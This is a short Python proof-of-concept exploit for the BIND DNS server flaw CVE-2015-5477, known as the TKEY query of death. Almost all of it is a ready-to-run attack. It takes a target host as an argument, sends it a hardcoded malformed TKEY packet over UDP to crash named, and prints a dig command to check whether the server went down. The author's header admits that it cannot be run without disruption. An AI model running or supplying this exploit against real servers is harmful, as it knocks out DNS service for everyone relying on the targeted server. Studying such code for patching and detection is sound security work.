#!/usr/bin/python
# Title: BIND Remote DoS via TKEY queries
# aka: DNS TKEY Query of Death
# Author: Lorenzo Corsini <serdat>
# E-Mail: serdat5[at]gmail[dot]com
# Twitter: https://twitter.com/serdat5tm
# References:
# https://kb.isc.org/article/AA-01272
# https://www.isc.org/blogs/about-cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/
# Warning there is no way to use this PoC in a non-desruptive manner.
# Use with care. I'm not responsible for what you'll do with that
import socket
import sys
#Not randomized.
DNS_PACKET='\x04X\x00\x80\x00\x01\x00\x01\x00\x00\x00\x01\x03xxx\x00\x00\xf9\x00\xff\x03xxx\x00\x00\xf9\x00\xff\x00\x00\x00\x00\x00%\x03xxx\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x00\x00\x03xxx\x00\x00\x10\x00\xff\x00\x00\x00\x00\x00%$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
try:
HOST=sys.argv[1]
PORT= 53
except:
print "Usage: %s host_to_crash" & sys.argv[0]
sys.exit(-1)
print "Exploiting target at %s" % HOST
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.sendto(DNS_PACKET,(HOST,PORT))
s.close()
print "Check Manually if the exploit worked... try launching:"
print "dig @%s CR4SH3D any" % HOST
